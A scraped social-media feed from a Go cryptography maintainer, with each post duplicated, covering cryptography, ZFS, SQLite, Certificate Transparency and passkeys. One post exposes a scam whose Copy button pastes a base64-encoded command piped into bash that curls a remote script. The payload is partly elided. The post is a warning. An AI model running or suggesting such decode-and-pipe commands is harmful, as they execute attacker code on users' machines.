Cryptogopher / Go cryptography maintainer
Professional open source maintainer
https://filippo.io / https://github.com/FiloSottile
https://mkcert.dev / https://age-encryption.org
https://sunlight.dev / https://filippo.io/newsletter
This is the same technique as words.filippo.io/rsa-keygen-b....
This is the same technique as words.filippo.io/rsa-keygen-b....
Now I want to go back on the livestream recording to find how I generated the wrong constants. I blame Python.
Now I want to go back on the livestream recording to find how I generated the wrong constants. I blame Python.
I don't care about the letter of the CoC or about transparency, even. Moderation is the human and nuanced job that shapes a community.
I don't care about the letter of the CoC or about transparency, even. Moderation is the human and nuanced job that shapes a community.
(And thank you! ✨)
(And thank you! ✨)
This programming thing is clearly a bubble.
This programming thing is clearly a bubble.
github.com/FiloSottile/...
A template that sets up a daily GitHub Actions backup with goat.
Based on git-scraper-template by @simonwillison.net.
github.com/FiloSottile/...
A template that sets up a daily GitHub Actions backup with goat.
Based on git-scraper-template by @simonwillison.net.
However, this part of zfs-receive.8 makes it sound like a compromised sender could cause snapshots to be deleted on the recipient.
Does ZFS replication unavoidably trust the sender?
However, this part of zfs-receive.8 makes it sound like a compromised sender could cause snapshots to be deleted on the recipient.
Does ZFS replication unavoidably trust the sender?
The Copy button copies to the clipboard
echo "Y3Vy[...]ggJg==" | base64 -d | bash
which in turn curls this script gist.github.com/FiloSottile/... into bash.
They even detect piping, so to read it you have to run "curl | cat".
The Copy button copies to the clipboard
echo "Y3Vy[...]ggJg==" | base64 -d | bash
which in turn curls this script gist.github.com/FiloSottile/... into bash.
They even detect piping, so to read it you have to run "curl | cat".
No, not on top of SQLite. In SQLite.
WITH RECURSIVE plus WITHOUT ROWID plus a small app-defined function.
Might be time to stop.
(This is for a very cool verifiable transparency log indexing thing.)
No, not on top of SQLite. In SQLite.
WITH RECURSIVE plus WITHOUT ROWID plus a small app-defined function.
Might be time to stop.
(This is for a very cool verifiable transparency log indexing thing.)
I appreciated the forced opportunity to give an overdue update on how we're doing. In short, it has been sustainably chugging along, working exactly as intended!
I appreciated the forced opportunity to give an overdue update on how we're doing. In short, it has been sustainably chugging along, working exactly as intended!
What's neat is that the password never touches the client! Attackers need to compromise *first* the server, and *then* the passkey.
It's delightfully little code. https://github.com/FiloSottile/mostly-harml
What's neat is that the password never touches the client! Attackers need to compromise *first* the server, and *then* the passkey.
It's delightfully little code. https://github.com/FiloSottile/mostly-harml
These logs are Sunlight-based, and operated by Geomys and Port 179 LTD on bare metal. They cost 50 times less than RFC 6962 logs in the cloud.
https://groups.google.com/a/chromium.org/g/ct-policy/c/KCzYEIIZSx
These logs are Sunlight-based, and operated by Geomys and Port 179 LTD on bare metal. They cost 50 times less than RFC 6962 logs in the cloud.
https://groups.google.com/a/chromium.org/g/ct-policy/c/KCzYEIIZSx
I love uBO Lite precisely because it doesn't make me trust an extension developer with all my browser security...
(Let's not re-debate MV3 unnecessarily please. Will block.)
I love uBO Lite precisely because it doesn't make me trust an extension developer with all my browser security...
(Let's not re-debate MV3 unnecessarily please. Will block.)
I wonder if it's the first time it's a non-Googler.
(This is all for fun, commit count is not much of a metric, although they are all individually code reviewed.)
I wonder if it's the first time it's a non-Googler.
(This is all for fun, commit count is not much of a metric, although they are all individually code reviewed.)
I get why you can’t target it for a broadly useful product, but jj’s way to handle conflicts would work so well with a LLM tool.
I get why you can’t target it for a broadly useful product, but jj’s way to handle conflicts would work so well with a LLM tool.
There was no way to deliver a good talk on this without making enemies 😅
There was no way to deliver a good talk on this without making enemies 😅
It associates values to keys, with automatic garbage collection once the key becomes unreachable. Using it to tie precomputed FIPS keys to PrivateKey values we can't modify.
It associates values to keys, with automatic garbage collection once the key becomes unreachable. Using it to tie precomputed FIPS keys to PrivateKey values we can't modify.